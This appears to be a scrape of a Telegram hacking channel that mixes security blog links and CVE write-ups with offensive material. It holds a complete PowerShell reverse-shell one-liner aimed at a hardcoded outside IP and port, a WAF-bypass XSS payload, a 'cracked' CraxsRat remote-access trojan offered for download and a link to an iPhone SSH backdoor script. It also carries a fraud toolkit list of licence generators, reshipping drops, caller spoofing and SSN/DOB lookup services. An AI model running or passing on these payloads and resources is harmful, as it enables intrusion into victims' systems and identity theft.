A new blog on Digital Forensics
Learn How to use Volatility | Digital Forensics
https://techofide.com/blogs/what-is-digital-forensics-practical-demo-on-volatility/
This blog will teach you alot of new stuff about digital forensics
A beginner and don't know what exactly digital forensics?
I recommend you to go with this blog to clear your basic concepts
https://techofide.com/blogs/what-is-digital-forensics-how-to-use-digital-forensics-tools/
Join our group for more such Cyber security exclusive content
t.me/ethicalhackingtechofide
Learn How to use Volatility | Digital Forensics
https://techofide.com/blogs/what-is-digital-forensics-practical-demo-on-volatility/
This blog will teach you alot of new stuff about digital forensics
A beginner and don't know what exactly digital forensics?
I recommend you to go with this blog to clear your basic concepts
https://techofide.com/blogs/what-is-digital-forensics-how-to-use-digital-forensics-tools/
Join our group for more such Cyber security exclusive content
t.me/ethicalhackingtechofide
Forwarded from Prapatti ็ชใๅ า
PowerShell opens a TCP socket on the remote server and executes the input as a command, sending the output back.
Stupid backdoor!
usage:
Stupid backdoor!
usage:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('106.12.252.10',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"๐4
epco-reserved-poc.dat
263 B
๐ฅShannon Baseband: Intra-object overflow in NrSmPcoCodec when decoding reserved options(CVE-2023-26076).
There is an intra-object overflow in Shannon Baseband, inside the 5G SM protocol implementation (
The problem is that the size of the content isnโt checked before copying it. As the length of content can be up to
The array that holds the โReservedโ option data isnโt in a standalone allocation, rather this array is a part of a larger structure. Thus, an OOB write as described above overwrites other data within the same structure. It is currently unclear what kind of data lies after the 6 reservedPco buffers within reach of the overwrite.
๐An โExtended protocol configuration optionsโ message that triggers the overflow is provided in
There is an intra-object overflow in Shannon Baseband, inside the 5G SM protocol implementation (
NrSmMsgCodec as itโs called in Shannon according to debug strings), when decoding the โExtended protocol configuration optionsโ message (IEI = 0x7B).The problem is that the size of the content isnโt checked before copying it. As the length of content can be up to
255 bytes, copying the content to one of the 6 reservedPco buffers can result in an OOB write.The array that holds the โReservedโ option data isnโt in a standalone allocation, rather this array is a part of a larger structure. Thus, an OOB write as described above overwrites other data within the same structure. It is currently unclear what kind of data lies after the 6 reservedPco buffers within reach of the overwrite.
๐An โExtended protocol configuration optionsโ message that triggers the overflow is provided in
epco-reserved-poc.dat.๐ฅExploiting aCropalypse: Recovering Truncated PNGs.
aCropalypse(CVE-2023-21036, Information disclosure in Pixel's Markup) is a serious privacy vulnerability in the Google Pixel's inbuilt screenshot editing tool, Markup, enabling partial recovery of the original, unedited image data of a cropped and/or redacted screenshot.
๐Demo available here.
aCropalypse(CVE-2023-21036, Information disclosure in Pixel's Markup) is a serious privacy vulnerability in the Google Pixel's inbuilt screenshot editing tool, Markup, enabling partial recovery of the original, unedited image data of a cropped and/or redacted screenshot.
๐Demo available here.
Forwarded from ELEMENT-/-11
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from ELEMENT-/-11
This media is not supported in your browser
VIEW IN TELEGRAM
โคโ๐ฅ2
Forwarded from ELEMENT-/-11
Equipment's Required For Ten Year Inspection and Maintaining Egress System of Pakistan's Fighter Jet JF-17.
bypass for the FortiWeb (Fortinet) WAF
usage:
"><iframe src=//14.rs>
i.e. instead of the standard XSS payload to execute js
usage:
"><iframe src=//14.rs>
i.e. instead of the standard XSS payload to execute js
๐9
A new blog on Advance SQL Injection attacks.
Here is the link to the blog:
https://techofide.com/blogs/advanced-sql-injection-attack-sqli-blind-sql-injection-and-prevention/
If you are new and don't know what is SQL and SQLi then you can check our blog where we cover everything from scratch.
Here is the link to that blog:
https://techofide.com/blogs/sql-injection-attack-sqli-sql-injection-prevention-sql-injection-cheat-sheet-practical-demo/
Please show your support by liking the blog if you found our content helpful
Join our group for more such Cyber security content
t.me/ethicalhackingtechofide
Here is the link to the blog:
https://techofide.com/blogs/advanced-sql-injection-attack-sqli-blind-sql-injection-and-prevention/
If you are new and don't know what is SQL and SQLi then you can check our blog where we cover everything from scratch.
Here is the link to that blog:
https://techofide.com/blogs/sql-injection-attack-sqli-sql-injection-prevention-sql-injection-cheat-sheet-practical-demo/
Please show your support by liking the blog if you found our content helpful
Join our group for more such Cyber security content
t.me/ethicalhackingtechofide
Mitigating SSRF in 2023
https://ift.tt/EhW6jnc
Submitted March 21, 2023 at 08:03PM by l_tennant
via reddit https://ift.tt/2W1fGbM
https://ift.tt/EhW6jnc
Submitted March 21, 2023 at 08:03PM by l_tennant
via reddit https://ift.tt/2W1fGbM
Include Security Research Blog
Mitigating SSRF in 2023 - Include Security Research Blog
Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to trick a server-side application to make a request to an unintended location. SSRF, unlike most other specific vulnerabilities, has gained its own spot on the OWASP Top 10 2021.โฆ
๐1
โโCEH-Exam-Questions
Planning To Take Certified Ethical Hacker (CEH)? Here are github repo with 125 questions and answers to help you prep for the test.
https://github.com/ryh04x/CEH-Exam-Questions
#cybersecurity #infosec
Planning To Take Certified Ethical Hacker (CEH)? Here are github repo with 125 questions and answers to help you prep for the test.
https://github.com/ryh04x/CEH-Exam-Questions
#cybersecurity #infosec
โโiPhone-SSH-Backdoor
This is a shell script that creates an SSH backdoor on an iPhone.
https://github.com/SleepTheGod/iPhone-SSH-Backdoor
#cybersecurity #infosec
This is a shell script that creates an SSH backdoor on an iPhone.
https://github.com/SleepTheGod/iPhone-SSH-Backdoor
#cybersecurity #infosec
๐ฐ| ADVANCED GOOGLE DORKING |๐ฐ
๐ 1. Unlocking the Secrets of Google Dorking: A Beginnerโs Guide to Search Hacking
๐ Link :- https://thecyberblogs.com/google-searching-basics-part-1/
๐ 2. Mastering the Art of Google Dorking: The Basic Rules You Need to Know
๐ Link :- https://thecyberblogs.com/mastering-the-art-of-google-dorking-the-basic-rules-you-need-to-know/
๐ 3. Mastering Google Dorking: Understanding the Basic Syntax
๐ Link :- https://thecyberblogs.com/mastering-google-dorking-understanding-the-basic-syntax/
๐ 4. Mastering Google Dorking: Unleashing the Power of Extended Search Operators
๐ Link :- https://thecyberblogs.com/mastering-google-dorking-unleashing-the-power-of-extended-search-operators/
๐ 5. Mastering Google Dorking: Unleashing the Power of Advanced Search Operators
๐ Link :- https://thecyberblogs.com/mastering-google-dorking-unleashing-the-power-of-advanced-search-operators/
๐ 6. Google Dorking: From Basic to Advanced Techniques for Smarter Web Searches
๐ Link :- https://thecyberblogs.com/mastering-google-dorking-unleashing-the-power-of-advanced-search-operators/
๐ 7. Unlocking the Power of Googleโs Regex System for Smarter Searches
๐ Link :- https://thecyberblogs.com/learning-google-regex-system/
๐ 8. Uncovering SQL Injection Vulnerabilities with Google Dorking: A Step-by-Step Guide
๐ Link :- https://thecyberblogs.com/sqli-error-vulnerability/
๐ 9. Stringed or extended dorks
๐ Link :- https://thecyberblogs.com/learn-how-to-string-extend-google-dorks-part-9/
๐ 10. Master Google Dorking with a Practical Example | Boost Your Online Security Today
๐ Link :- https://thecyberblogs.com/learn-how-to-string-extend-google-dorks-part-9/
๐ 11. Uncover Hidden Information with Practical Examples of Google Dorking
๐ Link :- https://thecyberblogs.com/finding-various-vulnerabilities-using-google-dorking-part-9-1/
๐ 12. Advance google dorking cheatsheet pdf
๐ Link :- https://bit.ly/3T9EMP4
๐ 1. Unlocking the Secrets of Google Dorking: A Beginnerโs Guide to Search Hacking
๐ Link :- https://thecyberblogs.com/google-searching-basics-part-1/
๐ 2. Mastering the Art of Google Dorking: The Basic Rules You Need to Know
๐ Link :- https://thecyberblogs.com/mastering-the-art-of-google-dorking-the-basic-rules-you-need-to-know/
๐ 3. Mastering Google Dorking: Understanding the Basic Syntax
๐ Link :- https://thecyberblogs.com/mastering-google-dorking-understanding-the-basic-syntax/
๐ 4. Mastering Google Dorking: Unleashing the Power of Extended Search Operators
๐ Link :- https://thecyberblogs.com/mastering-google-dorking-unleashing-the-power-of-extended-search-operators/
๐ 5. Mastering Google Dorking: Unleashing the Power of Advanced Search Operators
๐ Link :- https://thecyberblogs.com/mastering-google-dorking-unleashing-the-power-of-advanced-search-operators/
๐ 6. Google Dorking: From Basic to Advanced Techniques for Smarter Web Searches
๐ Link :- https://thecyberblogs.com/mastering-google-dorking-unleashing-the-power-of-advanced-search-operators/
๐ 7. Unlocking the Power of Googleโs Regex System for Smarter Searches
๐ Link :- https://thecyberblogs.com/learning-google-regex-system/
๐ 8. Uncovering SQL Injection Vulnerabilities with Google Dorking: A Step-by-Step Guide
๐ Link :- https://thecyberblogs.com/sqli-error-vulnerability/
๐ 9. Stringed or extended dorks
๐ Link :- https://thecyberblogs.com/learn-how-to-string-extend-google-dorks-part-9/
๐ 10. Master Google Dorking with a Practical Example | Boost Your Online Security Today
๐ Link :- https://thecyberblogs.com/learn-how-to-string-extend-google-dorks-part-9/
๐ 11. Uncover Hidden Information with Practical Examples of Google Dorking
๐ Link :- https://thecyberblogs.com/finding-various-vulnerabilities-using-google-dorking-part-9-1/
๐ 12. Advance google dorking cheatsheet pdf
๐ Link :- https://bit.ly/3T9EMP4
๐1
๐ฅ"Actual" image recovery:
1๏ธโฃTake a JPEG image
2๏ธโฃMake a copy of it
3๏ธโฃCrop it in Snipping Tool
4๏ธโฃSave/overwrite
4๏ธโฃIn a hex editor, overwrite the EOI Marker (0xFFD9)
5๏ธโฃRepair it at http://jpg.repair
6๏ธโฃWonder how secure your cropped image data is
1๏ธโฃTake a JPEG image
2๏ธโฃMake a copy of it
3๏ธโฃCrop it in Snipping Tool
4๏ธโฃSave/overwrite
4๏ธโฃIn a hex editor, overwrite the EOI Marker (0xFFD9)
5๏ธโฃRepair it at http://jpg.repair
6๏ธโฃWonder how secure your cropped image data is
Forwarded from ๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐
#USEFUL SITES TO USE ON (Some Links Not Up To Date)
BROWSER FINGERPRINT TEST
https://panopticick.eff.org
https://whatleaks.com/
DRIVER LICENSE GENERATOR
https://www.elfqrin.com
http://www.highprogrammer.com/cgi-bin/uniqueid/dl
DROP/RESHIP
http://reship.com
https://www.myus.com
https://www.shipito.com
https://www.usunlocked.com/
https://virtualpostmail.com
DNS LEAK TEST
dnsleaktest.com
https://www.simplednscrypt.org/
VIRTUAL OFFICE
https://www.opusvirtualoffices.com/
https://www.regus.com/
https:cloudvo.com/
https://www.davincivirtual.com/fit-small-business
http://www.alliedoffices.com/
AREA PHONE CODES
https://www.allareacodes.com
SMS VERIFICATION
Smspool.net
https://app.truverifi.com/login
http://www.receive-sms-now.com
https://azersms.com/
http://www.textnow.com
https://www.blacktel.io/
SPOOF PHONE
https://www.spooftel.com
https://tracebust.com/
https://www.spoofcard.com
https:/ /securecall.club/login
USER AGENT CHECKER
http://whatsmyuseragent.com
FAX SENDER
https://portalpamfax.biz/PortalLogin/lnit/
FREE UDEMY COURSES
https://www.zapcourses.com
https://www.freshersgold.com
CUSTOM/FAKE RECEIPT MAKER
http://www.fakereceipt.us/sales_receipt.php
http://www.customreceipt.com/
SSN VALIDATOR
http://www.ssnvalidator.com
SSN DECODER
http://www.stevemorse.org/ssn/ssn.html
SOCKS CHECKER
https://fraud.cat/
https://xdedicvhnguh5s6k.onion/
https://www.ipqualityscore.com/
https://getipintel.net/index.php#web
EIN SEARCH
http://www.feinsearch.com
https://www.einfinder.com
htp://freerisa.benefitspro.com/
http://dor.wa.gov/content/doingbusiness/registermybusiness/BR
D/default.aspx
http://search.sunbiz.org/Inquiry/CorporationSearch/ByFeiNumber
RESIDENTIAL RDP ACCEPTING BITCOIN
https://www.resnetworking.com/
https://exavpn.com/
https:/ฤฑxdedicvhnguh5s6k.onion/
SSN/DOB SEARCH
https://ssndob.cc
https://robocheck.cm
MMN AUTOSEARCH
archives.com
ancestry.com
BACKGROUND CHECK
http://www.intelius.com
http://checkmate.com
http://equifax.com
http://thatsthem.com
https://www.mylife.com
https://t.me/tutorials_zone
https://www.peoplesmart.com
http://familytreenow.com
https://ogin.dicore.com/
https://www.tlo.com/
https://batchskiptracing.com/pricing/
CREDIT REPORT
https://www.quizzle.com
https://my.bankrate.com
freecreditreport.com
creditkarma.com/free-credit-report
โโโโโโโโโโ
BROWSER FINGERPRINT TEST
https://panopticick.eff.org
https://whatleaks.com/
DRIVER LICENSE GENERATOR
https://www.elfqrin.com
http://www.highprogrammer.com/cgi-bin/uniqueid/dl
DROP/RESHIP
http://reship.com
https://www.myus.com
https://www.shipito.com
https://www.usunlocked.com/
https://virtualpostmail.com
DNS LEAK TEST
dnsleaktest.com
https://www.simplednscrypt.org/
VIRTUAL OFFICE
https://www.opusvirtualoffices.com/
https://www.regus.com/
https:cloudvo.com/
https://www.davincivirtual.com/fit-small-business
http://www.alliedoffices.com/
AREA PHONE CODES
https://www.allareacodes.com
SMS VERIFICATION
Smspool.net
https://app.truverifi.com/login
http://www.receive-sms-now.com
https://azersms.com/
http://www.textnow.com
https://www.blacktel.io/
SPOOF PHONE
https://www.spooftel.com
https://tracebust.com/
https://www.spoofcard.com
https:/ /securecall.club/login
USER AGENT CHECKER
http://whatsmyuseragent.com
FAX SENDER
https://portalpamfax.biz/PortalLogin/lnit/
FREE UDEMY COURSES
https://www.zapcourses.com
https://www.freshersgold.com
CUSTOM/FAKE RECEIPT MAKER
http://www.fakereceipt.us/sales_receipt.php
http://www.customreceipt.com/
SSN VALIDATOR
http://www.ssnvalidator.com
SSN DECODER
http://www.stevemorse.org/ssn/ssn.html
SOCKS CHECKER
https://fraud.cat/
https://xdedicvhnguh5s6k.onion/
https://www.ipqualityscore.com/
https://getipintel.net/index.php#web
EIN SEARCH
http://www.feinsearch.com
https://www.einfinder.com
htp://freerisa.benefitspro.com/
http://dor.wa.gov/content/doingbusiness/registermybusiness/BR
D/default.aspx
http://search.sunbiz.org/Inquiry/CorporationSearch/ByFeiNumber
RESIDENTIAL RDP ACCEPTING BITCOIN
https://www.resnetworking.com/
https://exavpn.com/
https:/ฤฑxdedicvhnguh5s6k.onion/
SSN/DOB SEARCH
https://ssndob.cc
https://robocheck.cm
MMN AUTOSEARCH
archives.com
ancestry.com
BACKGROUND CHECK
http://www.intelius.com
http://checkmate.com
http://equifax.com
http://thatsthem.com
https://www.mylife.com
https://t.me/tutorials_zone
https://www.peoplesmart.com
http://familytreenow.com
https://ogin.dicore.com/
https://www.tlo.com/
https://batchskiptracing.com/pricing/
CREDIT REPORT
https://www.quizzle.com
https://my.bankrate.com
freecreditreport.com
creditkarma.com/free-credit-report
โโโโโโโโโโ
CraxsRat 4.0.1.rar
140.9 MB
CRAXS RAT V4 CRACKED
- FIXED BUILD
- NEW FUNCTIONS
Use It In VM Or RDP
Don't download = Not Working
- FIXED BUILD
- NEW FUNCTIONS
Use It In VM Or RDP
Don't download = Not Working
๐1
โโLeakySAB-PoC
PoC of 'LeakySAB' a vulnerability allowing extraction of usenet provider password from a SABnzbd instance.
https://github.com/rlaphoenix/LeakySAB-PoC
#cybersecurity #infosec
PoC of 'LeakySAB' a vulnerability allowing extraction of usenet provider password from a SABnzbd instance.
https://github.com/rlaphoenix/LeakySAB-PoC
#cybersecurity #infosec
